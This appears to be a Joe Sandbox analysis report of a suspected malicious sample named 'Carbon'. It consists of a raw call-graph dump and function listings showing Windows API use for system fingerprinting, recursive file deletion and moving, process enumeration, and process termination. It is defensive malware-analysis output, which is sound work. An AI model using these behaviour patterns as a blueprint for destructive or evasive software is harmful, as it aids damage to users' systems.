107824->107832 107826 91f0c8 107828 91f094 107826->107828 107852 922b68 20 API calls __dosmaperr 107826->107852 107831 91f0b1 LeaveCriticalSection __fread_nolock 107828->107831 107829->107816 107830->107822 107831->107822 107833 91f0f4 107832->107833 107834 91f10e 107832->107834 107856 922b68 20 API calls __dosmaperr 107833->107856 107836 91dca5 __fread_nolock 26 API calls 107834->107836 107837 91f117 107836->107837 107853 929759 107837->107853 107838 91f0f9 107857 922aac 26 API calls ___std_exception_copy 107838->107857 107842 91f21b 107844 91f228 107842->107844 107847 91f1ce 107842->107847 107843 91f19f 107846 91f1bc 107843->107846 107843->107847 107859 922b68 20 API calls __dosmaperr 107844->107859 107858 91f3ff 31 API calls 4 library calls 107846->107858 107849 91f104 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 107847->107849 107860 91f27b 30 API calls 2 library calls 107847->107860 107849->107826 107850 91f1c6 107850->107849 107852->107828 107861 9295d6 107853->107861 107855 91f133 107855->107842 107855->107843 107855->107849 107856->107838 107857->107849 107858->107850 107859->107849 107860->107849 107862 9295e2 BuildCatchObjectHelperInternal 107861->107862 107863 929602 107862->107863 107864 9295ea 107862->107864 107865 9296b6 107863->107865 107870 92963a 107863->107870 107887 922b55 20 API calls __dosmaperr 107864->107887 107892 922b55 20 API calls __dosmaperr 107865->107892 107868 9295ef 107888 922b68 20 API calls __dosmaperr 107868->107888 107869 9296bb 107893 922b68 20 API calls __dosmaperr 107869->107893 107886 925497 EnterCriticalSection 107870->107886 107872 9295f7 __wsopen_s 107872->107855 107875 9296c3 107894 922aac 26 API calls ___std_exception_copy 107875->107894 107876 929640 107878 929664 107876->107878 107879 929679 107876->107879 107889 922b68 20 API calls __dosmaperr 107878->107889 107881 9296db __fread_nolock 28 API calls 107879->107881 107883 929674 107881->107883 107882 929669 107890 922b55 20 API calls __dosmaperr 107882->107890 107891 9296ae LeaveCriticalSection __wsopen_s 107883->107891 107886->107876 107887->107868 107888->107872 107889->107882 107890->107883 107891->107872 107892->107869 107893->107875 107894->107872 107895 8f19a9 107896 8f19b6 __wsopen_s 107895->107896 107911 8f4a1c 107896->107911 107898 8f1a35 107899 8f19bb 107899->107898 107922 8f2061 81 API calls 107899->107922 107901 8f19c8 107901->107898 107923 8f1d1b 83 API calls 107901->107923 107903 8f19d1 107903->107898 107904 8f19d5 GetFullPathNameW 107903->107904 107905 8f7467 8 API calls 107904->107905 107906 8f1a01 107905->107906 107907 8f7467 8 API calls 107906->107907 107908 8f1a0e 107907->107908 107909 932b08 107908->107909 107910 8f7467 8 API calls 107908->107910 107910->107898 107912 8f4a43 107911->107912 107920 8f4b60 107911->107920 107913 91015b 8 API calls 107912->107913 107912->107920 107915 8f4a6a 107913->107915 107914 91015b 8 API calls 107921 8f4adf 107914->107921 107915->107914 107916 8f4bb8 8 API calls 107916->107921 107918 8fa400 85 API calls 107918->107921 107919 8faa39 8 API calls 107919->107921 107920->107899 107921->107916 107921->107918 107921->107919 107921->107920 107924 96112a 8 API calls 107921->107924 107922->107901 107923->107903 107924->107921 107925 8f1727 SystemParametersInfoW 107926 8fa723 107927 8fa72d 107926->107927 107928 8faa39 8 API calls 107927->107928 107952 8fa440 __fread_nolock 107928->107952 107929 8fa64b 107930 8faa39 8 API calls 107929->107930 107933 8fa665 107930->107933 107931 8f7eaa 40 API calls 107931->107952 107932 8f6b3f 9 API calls 107932->107952 107934 8faa39 8 API calls 107934->107952 107935 93fb5d 107942 91012b 8 API calls 107935->107942 107936 93fc84 107954 959d96 83 API calls __wsopen_s 107936->107954 107938 8fa99d 107955 959d96 83 API calls __wsopen_s 107938->107955 107940 8fabe7 8 API calls 107940->107952 107941 8f9c50 8 API calls 107941->107952 107944 93fb7e 107942->107944 107943 93fc92 107945 8faa39 8 API calls 107943->107945 107947 91015b 8 API calls 107944->107947 107946 93fca8 107945->107946 107946->107933 107950 93fbb8 __fread_nolock 107947->107950 107948 8fb159 8 API calls 107951 8fa61c CharUpperBuffW 107948->107951 107949 8fab97 8 API calls 107949->107952 107950->107938 107951->107952 107952->107929 107952->107931 107952->107932 107952->107934 107952->107935 107952->107936 107952->107938 107952->107940 107952->107941 107952->107948 107952->107949 107952->107950 107953 91015b 8 API calls 107952->107953 107953->107952 107954->107943 107955->107933 107956 921d7c 107965 92d191 GetEnvironmentStringsW 107956->107965 107960 922d18 _free 20 API calls 107961 921dc9 107960->107961 107962 922d18 _free 20 API calls 107964 921d94 107962->107964 107963 921d9f 107963->107962 107964->107960 107966 92d1a5 107965->107966 107967 921d8e 107965->107967 107968 923b70 __fread_nolock 21 API calls 107966->107968 107967->107964 107972 921ea0 107967->107972 107969 92d1b9 __fread_nolock 107968->107969 107970 922d18 _free 20 API calls 107969->107970 107971 92d1d3 FreeEnvironmentStringsW 107970->107971 107971->107967 107974 921ebe 107972->107974 107973 924fcd BuildCatchObjectHelperInternal 20 API calls 107980 921ef8 107973->107980 107974->107973 107975 921f69 107976 922d18 _free 20 API calls 107975->107976 107977 921f83 107976->107977 107977->107963 107978 924fcd BuildCatchObjectHelperInternal 20 API calls 107978->107980 107979 921f6b 107990 921f9a 20 API calls _free 107979->107990 107980->107975 107980->107978 107980->107979 107985 921f8d 107980->107985 107987 922d18 _free 20 API calls 107980->107987 107989 92c3aa 26 API calls 2 library calls 107980->107989 107983 921f71 107984 922d18 _free 20 API calls 107983->107984 107984->107975 107991 922abc 11 API calls _abort 107985->107991 107987->107980 107988 921f99 107989->107980 107990->107983 107991->107988 107992 8fa761 108001 8f8138 107992->108001 107994 8fa79c 107997 8faa39 8 API calls 107994->107997 107995 8fa772 107995->107994 107996 8fab97 8 API calls 107995->107996 107998 8fa790 107996->107998 108000 8fa667 107997->108000 107999 8faa39 8 API calls 107998->107999 107999->107994 108002 8fabe7 8 API calls 108001->108002 108004 8f8147 108002->108004 108003 935c2f 108009 959d96 83 API calls __wsopen_s 108003->108009 108004->108003 108006 8f8195 108004->108006 108008 8f9c50 8 API calls 108004->108008 108006->107995 108007 935c3d 108008->108004 108009->108007 108010 8fe360 108013 909ee3 108010->108013 108012 8fe36c 108014 909f04 108013->108014 108015 909f61 108013->108015 108014->108015 108017 8ff1e0 229 API calls 108014->108017 108020 909fa5 108015->108020 108022 963d0b 81 API calls __wsopen_s 108015->108022 108019 909f35 108017->108019 108018 947f48 108018->108018 108019->108015 108019->108020 108021 8fad69 8 API calls 108019->108021 108020->108012 108021->108015 108022->108018 108023 8fe37c 108026 8fb940 108023->108026 108027 8fb95b 108026->108027 108028 940445 108027->108028 108029 940493 108027->108029 108056 8fb980 108027->108056 108032 94044f 108028->108032 108033 94045c 108028->108033 108028->108056 108066 976029 229 API calls 2 library calls 108029->108066 108064 9764ba 229 API calls 108032->108064 108052 8fbc50 108033->108052 108065 976957 229 API calls 2 library calls 108033->108065 108035 90bb11 8 API calls 108035->108056 108038 940726 108038->108038 108042 8fbc7e 108043 94066f 108068 976393 81 API calls 108043->108068 108046 8facbd 39 API calls 108046->108056 108047 8fa35b 8 API calls 108047->108056 108050 90e6c0 39 API calls 108050->108056 108051 8fbe10 39 API calls 108051->108056 108052->108042 108069 963d0b 81 API calls __wsopen_s 108052->108069 108053 8ff1e0 229 API calls 108053->108056 108054 8fad69 8 API calls 108054->108056 108056->108035 108056->108042 108056->108043 108056->108046 108056->108047 108056->108050 108056->108051 108056->108052 108056->108053 108056->108054 108057 90e67a 39 API calls 108056->108057 108058 90a955 229 API calls 108056->108058 108059 910592 5 API calls __Init_thread_wait 108056->108059 108060 9103f3 29 API calls __onexit 108056->108060 108061 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 108056->108061 108062 90f33d 81 API calls 108056->108062 108063 90f1a4 229 API calls 108056->108063 108067 94fd46 8 API calls 108056->108067 108057->108056 108058->108056 108059->108056 108060->108056 108061->108056 108062->108056 108063->108056 108064->108033 108065->108052 108066->108056 108067->108056 108068->108052 108069->108038 108070 8f2f78 108073 8f2f92 108070->108073 108074 8f2fa9 108073->108074 108075 8f300b 108074->108075 108076 8f2fae 108074->108076 108077 8f300d 108074->108077 108078 8f2ff2 DefWindowProcW 108075->108078 108081 8f2fbb 108076->108081 108082 8f3087 PostQuitMessage 108076->108082 108079 933084 108077->108079 108080 8f3013 108077->108080 108084 8f2f8c 108078->108084 108128 8f4286 10 API calls 108079->108128 108085 8f303f SetTimer RegisterWindowMessageW 108080->108085 108086 8f301a 108080->108086 108087 9330f1 108081->108087 108088 8f2fc6 108081->108088 108082->108084 108085->108084 108089 8f3068 CreatePopupMenu 108085->108089 108094 933025 108086->108094 108095 8f3023 KillTimer 108086->108095 108131 95c631 65 API calls ___scrt_fastfail 108087->108131 108090 8f3091 108088->108090 108091 8f2fd0 108088->108091 108089->108084 108118 90fc73 108090->108118 108096 8f2fdb 108091->108096 108097 9330d6 108091->108097 108093 9330a5 108129 90f09a 40 API calls 108093->108129 108101 933060 MoveWindow 108094->108101 108102 93302a 108094->108102 108103 8f2f14 Shell_NotifyIconW 108095->108103 108104 8f2fe6 108096->108104 108105 8f3075 108096->108105 108097->108078 108130 9511b9 8 API calls 108097->108130 108098 933103 108098->108078 108098->108084 108101->108084 108106 933030 108102->108106 108107 93304f SetFocus 108102->108107 108108 8f3036 108103->108108 108104->108078 108115 8f2f14 Shell_NotifyIconW 108104->108115 108126 8f30a2 75 API calls ___scrt_fastfail 108105->108126 108106->108104 108110 933039 108106->108110 108107->108084 108125 8f47a8 DeleteObject DestroyWindow 108108->108125 108127 8f4286 10 API calls 108110->108127 108113 8f3085 108113->108084 108116 9330ca 108115->108116 108117 8f3989 60 API calls 108116->108117 108117->108075 108119 90fd11 108118->108119 108120 90fc8b ___scrt_fastfail 108118->108120 108119->108084 108121 8f5033 55 API calls 108120->108121 108123 90fcb2 108121->108123 108122 90fcfa KillTimer SetTimer 108122->108119 108123->108122 108124 94fbc2 Shell_NotifyIconW 108123->108124 108124->108122 108125->108084 108126->108113 108127->108084 108128->108093 108129->108104 108130->108075 108131->108098 108132 8f1033 108137 8f5714 108132->108137 108136 8f1042 108138 8fae03 8 API calls 108137->108138 108139 8f5782 108138->108139 108145 8f4648 108139->108145 108141 8f581f 108142 8f1038 108141->108142 108148 8f5974 8 API calls __fread_nolock 108141->108148 108144 9103f3 29 API calls __onexit 108142->108144 108144->108136 108149 8f4674 108145->108149 108148->108141 108150 8f4667 108149->108150 108151 8f4681 108149->108151 108150->108141 108151->108150 108152 8f4688 RegOpenKeyExW 108151->108152 108152->108150 108153 8f46a2 RegQueryValueExW 108152->108153 108154 8f46d8 RegCloseKey 108153->108154 108155 8f46c3 108153->108155 108154->108150 108155->108154

                                                            Executed Functions

                                                            Function 008F4E68 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 224libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 351 8f4e68-8f4ed7 call 8fae03 GetVersionExW call 8f7467 356 8f4edd 351->356 357 9340e6-9340f9 351->357 359 8f4edf-8f4ee1 356->359 358 9340fa-9340fe 357->358 360 934101-93410d 358->360 361 934100 358->361 362 934125 359->362 363 8f4ee7-8f4f40 call 8f8635 call 8f699d 359->363 360->358 364 93410f-934111 360->364 361->360 367 93412c-934136 362->367 375 8f4f46-8f4f48 363->375 376 934259-934260 363->376 364->359 366 934117-93411e 364->366 366->357 370 934120 366->370 371 934149-934155 367->371 372 934138-934144 367->372 370->362 374 8f4fa6-8f4fc0 GetCurrentProcess IsWow64Process 371->374 372->374 377 8f501f-8f5025 374->377 378 8f4fc2 374->378 382 8f4f4e-8f4f51 375->382 383 93415a-93416d 375->383 379 934262 376->379 380 934280-934283 376->380 381 8f4fc8-8f4fd4 377->381 378->381 386 934268 379->386 388 934285-934294 380->388 389 93426e-934276 380->389 390 8f4fda-8f4fe9 LoadLibraryA 381->390 391 93429e-9342a2 GetSystemInfo 381->391 382->374 387 8f4f53-8f4f8f 382->387 384 934196-934198 383->384 385 93416f-934178 383->385 394 93419a-9341af 384->394 395 9341cd-9341d0 384->395 392 934185-934191 385->392 393 93417a-934180 385->393 386->389 387->374 396 8f4f91-8f4f9a 387->396 388->386 397 934296-93429c 388->397 389->380 398 8f4feb-8f4ff9 GetProcAddress 390->398 399 8f5027-8f5031 GetSystemInfo 390->399 392->374 393->374 401 9341b1-9341b7 394->401 402 9341bc-9341c8 394->402 404 9341d2-9341ed 395->404 405 93420b-93420e 395->405 396->367 403 8f4fa0 396->403 397->389 398->399 406 8f4ffb-8f4fff GetNativeSystemInfo 398->406 400 8f5001-8f5003 399->400 410 8f500c-8f501e 400->410 411 8f5005-8f5006 FreeLibrary 400->411 401->374 402->374 403->374 407 9341fa-934206 404->407 408 9341ef-9341f5 404->408 405->374 409 934214-93423b 405->409 406->400 407->374 408->374 412 934248-934254 409->412 413 93423d-934243 409->413 411->410 412->374 413->374
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 008F4E97
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            • GetCurrentProcess.KERNEL32(?,0098DB24,00000000,?,?), ref: 008F4FAD
                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 008F4FB4
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008F4FDF
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008F4FF1
                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 008F4FFF
                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 008F5006
                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 008F502B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 3290436268-192647395
                                                            • Opcode ID: c8693963af7e8ca8a607f91b8659818040cfd7b5da3cad365d8fa318c9af0c4b
                                                            • Instruction ID: 82811d49095b2c1fed8c76fda36c9dc53b9c07e94117bd83b37f805c1785937a
                                                            • Opcode Fuzzy Hash: c8693963af7e8ca8a607f91b8659818040cfd7b5da3cad365d8fa318c9af0c4b
                                                            • Instruction Fuzzy Hash: 0C91B032D3E3C8CFD716DB787C44DAA7FA4AB76F04B054899F184933A5D6294504EB22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095D65B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1059 95d65b-95d6b9 call 8fae03 * 3 call 8f3ff7 * 2 call 95e76d call 95e7da 1074 95d6c4-95d6ce call 95e7da 1059->1074 1075 95d6bb-95d6bf call 8f59dc 1059->1075 1079 95d6d0-95d6d4 call 8f59dc 1074->1079 1080 95d6d9-95d717 call 8fae03 * 2 call 8f3e34 FindFirstFileW 1074->1080 1075->1074 1079->1080 1088 95d71d 1080->1088 1089 95d848-95d84f FindClose 1080->1089 1091 95d723-95d725 1088->1091 1090 95d852-95d880 call 8fac28 * 5 1089->1090 1091->1089 1093 95d72b-95d732 1091->1093 1095 95d814-95d827 FindNextFileW 1093->1095 1096 95d738-95d79e call 8fa1d4 call 95ddaa call 8fac28 call 8f6aa4 call 8f59dc call 95dab3 1093->1096 1095->1091 1099 95d82d-95d832 1095->1099 1118 95d7c4-95d7c8 1096->1118 1119 95d7a0-95d7a3 1096->1119 1099->1091 1120 95d7f6-95d7fc call 95d881 1118->1120 1121 95d7ca-95d7cd 1118->1121 1122 95d837-95d846 FindClose call 8fac28 1119->1122 1123 95d7a9-95d7c0 call 90e224 1119->1123 1132 95d801 1120->1132 1124 95d7dd-95d7ed call 95d881 1121->1124 1125 95d7cf 1121->1125 1122->1090 1129 95d7d2-95d7db MoveFileW 1123->1129 1136 95d7c2 DeleteFileW 1123->1136 1124->1122 1137 95d7ef-95d7f4 DeleteFileW 1124->1137 1125->1129 1134 95d804-95d806 1129->1134 1132->1134 1134->1122 1138 95d808-95d810 call 8fac28 1134->1138 1136->1118 1137->1134 1138->1095
                                                            APIs
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 0095E7DA: GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095D707
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0095D7C2
                                                            • MoveFileW.KERNEL32(?,?), ref: 0095D7D5
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0095D7F2
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0095D81C
                                                              • Part of subcall function 0095D881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0095D801,?,?), ref: 0095D897
                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0095D838
                                                            • FindClose.KERNEL32(00000000), ref: 0095D849
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 1946585618-1173974218
                                                            • Opcode ID: 246eb1bc24a58783e1432d160dd814fd0714778915bf2eb9cb17d7ea8082c38e
                                                            • Instruction ID: e89da18b60cc5cd52c54f81427f33d0a39b1dfb55578b323c05dbc4d9a2f59a5
                                                            • Opcode Fuzzy Hash: 246eb1bc24a58783e1432d160dd814fd0714778915bf2eb9cb17d7ea8082c38e
                                                            • Instruction Fuzzy Hash: 7861587180210DAACF15EBA5DA829FDB7B9FF14311F204069E906B7192DB306F0DCB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095D98E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1473 95d98e-95d9d5 call 8fae03 * 3 call 8f3ff7 call 95e7da 1484 95d9e5-95da16 call 8f3e34 FindFirstFileW 1473->1484 1485 95d9d7-95d9e0 call 8f59dc 1473->1485 1489 95da85-95da8c FindClose 1484->1489 1490 95da18-95da1a 1484->1490 1485->1484 1492 95da90-95dab2 call 8fac28 * 3 1489->1492 1490->1489 1491 95da1c-95da21 1490->1491 1493 95da60-95da72 FindNextFileW 1491->1493 1494 95da23-95da5e call 8fad69 call 8f6aa4 call 8f59dc DeleteFileW 1491->1494 1493->1490 1497 95da74-95da7a 1493->1497 1494->1493 1508 95da7c-95da83 FindClose 1494->1508 1497->1490 1508->1492
                                                            APIs
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 0095E7DA: GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095DA05
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0095DA55
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095DA66
                                                            • FindClose.KERNEL32(00000000), ref: 0095DA7D
                                                            • FindClose.KERNEL32(00000000), ref: 0095DA86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: d7a908eaedbede7ce8a38f4f163bf5574088d7e481a2d44acdd91fda6c315a59
                                                            • Instruction ID: 8a6f1fa771884599fca09d1756bc916a7efca6b0625e4a683b2efabeafa0bb57
                                                            • Opcode Fuzzy Hash: d7a908eaedbede7ce8a38f4f163bf5574088d7e481a2d44acdd91fda6c315a59
                                                            • Instruction Fuzzy Hash: FA315C7100D3499BC214EB68D8918AFB7E8BE95315F444E1DF9E5D2191EB209A0DCBA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095DAC1 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0095DAE6
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0095DAF4
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0095DB14
                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 0095DBC1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3243318325-0
                                                            • Opcode ID: 6b66e97c6c9938c948c0b7884e5991a26c961910489240a803a911c589bbd30d
                                                            • Instruction ID: f2ade9c23949e506162e94479dc0846eccd05fcda27a5aa2d66928dbf68a494a
                                                            • Opcode Fuzzy Hash: 6b66e97c6c9938c948c0b7884e5991a26c961910489240a803a911c589bbd30d
                                                            • Instruction Fuzzy Hash: 87316F721083059FD315EF64D885ABEBBE8FF99350F04092DF585C21A1EB71AA49CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095E1AC Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00933902), ref: 0095E1BC
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095E1CD
                                                            • FindClose.KERNEL32(00000000), ref: 0095E1DD
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3dd0ccc57aa0ac9379465b71c16e2e1d70999840b245868c96184442731bec4a
                                                            • Instruction ID: 36f2412fccdb4ad335fb8e30c9062658a94629cc4e48a3699fe5d358c81c6efd
                                                            • Opcode Fuzzy Hash: 3dd0ccc57aa0ac9379465b71c16e2e1d70999840b245868c96184442731bec4a
                                                            • Instruction Fuzzy Hash: ECE04F368299106B9214A739EC0D8EA7B9C9A06336F100B15FD75C22E0EB75DE4497D6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00915038 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,0091500E,?,009B98A8,0000000C,00915165,?,00000002,00000000), ref: 00915059
                                                            • TerminateProcess.KERNEL32(00000000,?,0091500E,?,009B98A8,0000000C,00915165,?,00000002,00000000), ref: 00915060
                                                            • ExitProcess.KERNEL32 ref: 00915072
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 6100df3d66d1651d7fbe2ae3b95986534d30f3138c7e3e6269f548ae848bdd83
                                                            • Instruction ID: bb44107f444b6ca4518bc78e79473c20f92555b0d085be06f9bb0c3e977ccb16
                                                            • Opcode Fuzzy Hash: 6100df3d66d1651d7fbe2ae3b95986534d30f3138c7e3e6269f548ae848bdd83
                                                            • Instruction Fuzzy Hash: ACE0EC31115548EFCF217F94DD09B983B6DEF85785F464014F8098A272DB35DE82DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0090FFC0 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
